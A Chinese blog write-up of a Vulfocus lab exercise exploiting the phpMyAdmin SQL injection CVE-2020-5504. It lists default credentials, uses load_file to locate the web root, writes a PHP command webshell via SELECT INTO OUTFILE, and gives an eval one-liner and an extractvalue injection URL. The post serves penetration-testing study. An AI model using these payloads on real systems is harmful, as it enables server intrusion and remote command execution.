【漏洞复现-phpmyadmin-SQL注入】vulfocus/phpmyadmin-cve_2020_5504

已于 2022-10-12 22:47:01 修改
阅读量3k 收藏 10
点赞数 6
分类专栏: 0X06【漏洞复现】 文章标签: web安全
于 2022-10-12 21:21:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/127288113
版权

目录

一、靶场环境

1.1、平台:

1.2、知识:

1.3、描述:

二、漏洞验证

2.1、分析:

2.4、解题:

一、靶场环境

1.1、平台:

Vulfocus 漏洞威胁分析平台

123.58.224.8:64697

(看见这种页面,一般人就直接放弃了)

1.2、知识:

1、<pre>

pre 元素可定义预格式化的文本。被包围在 pre 元素中的文本通常会保留空格和换行符。而文本也会呈现为等宽字体。

<pre> 标签的一个常见应用就是用来表示计算机的源代码

2、写马

select into outfile "/path/file"

(知道log路径,也可以写入log中,如select '<?php eval($_GET[g]);?>')

1.3、描述:

基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等

(mysql是不允许外网连接的,有第三方工具就方便多了)

二、漏洞验证

2.1、分析:

URL后面加上/pma/index.php

(进入到了登陆页面)

提示的

账号密码root/123456

 执行SQL语句

输入

select @@datadir

(查询数据库的路径)

select @@basedir

(查询MYSQL数据库的安装路径)

 网站路径就凭经验和爆破了

SELECT load_file('/var/www/html/pma/index.php')

返回数据包4kb,一看就有东西,就对了

所以网站绝对路径为/var/www/html/pma

写马

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE '/var/www/html/pma/shell.php'

其他思路:

在sql执行环境下也有其他方法传参(但太过于复杂,token还需要截取点击go后的数据包来填)

http://ip:port/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))–+db=&token=&viewing_mode=server

而且要一级一级往下去查询

(所以能写马,就写马)

2.4、解题:

使用写入的参数cmd传入值 

刚开始用的cat读取文件(一想才知道flag是文件名)

http://ip:port/pma/shell.php?cmd=ls /tmp

黑色地带(崛起)
关注
专栏目录
phpmyadmin SQL注入CVE-2020-5504
千寻的博客
03-07 1486
phpMyAdminphpMyAdmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
VULFOCUS靶场CVE-2020-5504漏洞复现拿flag
u013345705的博客
07-18 2812
VULFOCUS CVE-2020-5504
phpmyadmin靶场
最新发布
wtl3333的博客
09-13 124
phpmyadmin靶场
[Vulfocus解题系列] phpmyadmin SQL注入CVE-2020-5504
00勇士王子的博客
10-01 3937
漏洞介绍 名称: phpmyadmin SQL注入CVE-2020-5504) 描述: phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 解题过程 1.访问题目环境,因为这个漏洞phpmyadmin的后台漏洞,
phpmyadmin SQL注入 漏洞CVE-2020-5504
xy_wjyjw的博客
10-31 621
输入 select @@datadir(查询数据库的路径),根据镜像给的信息(后台路径和用户名密码)进行访问并登录。所以网站绝对路径为/var/www/html/pma。输入 select @@basedir(查询。使用传入的参数cmd传入值,获取flag。phpmyadmin SQL注入。返回数据包3kib,一看就有东西。登录成功进入后台,击sql。
vulfocus phpmyadmin SQL注入CVE-2020-5504
weixin_61913198的博客
10-19 492
描述: phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。然后来到sql命令执行处可以直接执行sql命令,现在想要上传webshell需要找到网站绝对路径,常规思路让网站报错或者找phpinfo,找了一大圈没找到,这个时候就需要猜网站绝对路径了,还记得前面那个nginx嘛?访问http://ip/pma/index.php登陆,账号密码为admin 123456。
phpmyadmin SQL注入(CVE-2020-5504)
m0_65150886的博客
02-26 707
Phpmyadmin <= 5.00和Phpmyadmin <= 4.94时,在用户帐户页面中存在一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。5.查看 SELECT load_file('/var/www/html/pma/index.php')所以网站绝对路径为/var/www/html/pma。1.访问http://ip:port,出现如下页面,开始实验。
Phpmyadmin 后台sql注入漏洞CVE-2020-5504
jammny
11-29 2559
Phpmyadmin 后台sql注入漏洞CVE-2020-5504) 一、漏洞简介 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 二、漏洞影响 Phpmyadmin <= 5.00 Phpmyadmin <= 4.94 三、漏洞分析 https://xz.aliyun.com/t/7092 四、漏洞利用 登陆进入后台界面,将获取到的token值记下来。
phpmyadmin SQL注入CVE-2020-5504复现
weixin_63124284的博客
10-26 2502
在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。
phpmyadmin SQL注入CVE-2020-5504复现
YouthBelief的博客
11-11 4330
phpmyadmin SQL注入CVE-2020-5504phpmyadmin SQL注入CVE-2020-5504)0x01 漏洞描述0x02 影响范围0x03 漏洞复现漏洞利用0x04 漏洞修复 phpmyadmin SQL注入CVE-2020-5504) 0x01 漏洞描述 phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞
漏洞复现-phpmyadmin_SQL注入CVE-2020-5504
qq_58683895的博客
10-27 854
phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。路径:/pma/index.php 密码root:123456。证明有东西,应该就是首页,那网站的路径即为/var/www/html/pma。
PhpMyadminSQL注入(CVE-2020-0554)复现
玄道的网安博客
09-16 1969
简介 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 影响版本 phpMyAdmin 4 < 4.9.4 phpMyAdmin 5 < 5.0.1 环境搭建 为了方便做事,这里我直接用把phpmyadmin文件拖入刀集成环境中 下载地址 https://files.phpmyadmin.net/phpMyAdmin/5.0.0/phpMyAdm...
phpMyAdmin $_REQUEST参数发现SQL注入漏洞
phphot
04-07 1916
发布日期:2008-03-01更新日期:2008-03-04受影响系统:phpMyAdmin phpMyAdmin 不受影响系统:phpMyAdmin phpMyAdmin 2.11.5描述:BUGTRAQ ID: 28068phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。phpMyAdmin使用$_REQUEST而不是$_GET和$_POST变量作为其参数来源,并且在SQ
payload sql注入_phpMyAdmin后台SQL注入(CVE-2020-0554)
weixin_39682477的博客
12-20 312
0x01 简介phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。0x02 漏洞概述用户界面SQL执行语句存在可控变量,且未对可控参数进行过滤直接拼接。可造成低权限用户越权执行SQL指令。0...
PhpMyAdmin4.8.1文件包含漏洞分析及复现利用(CVE-2018-12613)
Zlirving_的博客
06-28 1130
漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码。 影响版本 php
sql注入phpmyadmin日志写入webshell
weixin_54813510的博客
05-25 1949
写入webshell的前提条件:1、需要root权限。2、知道网站根目录的绝对路径。3、数据库my.ini配置文件需要secure_file_priv配置为空。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值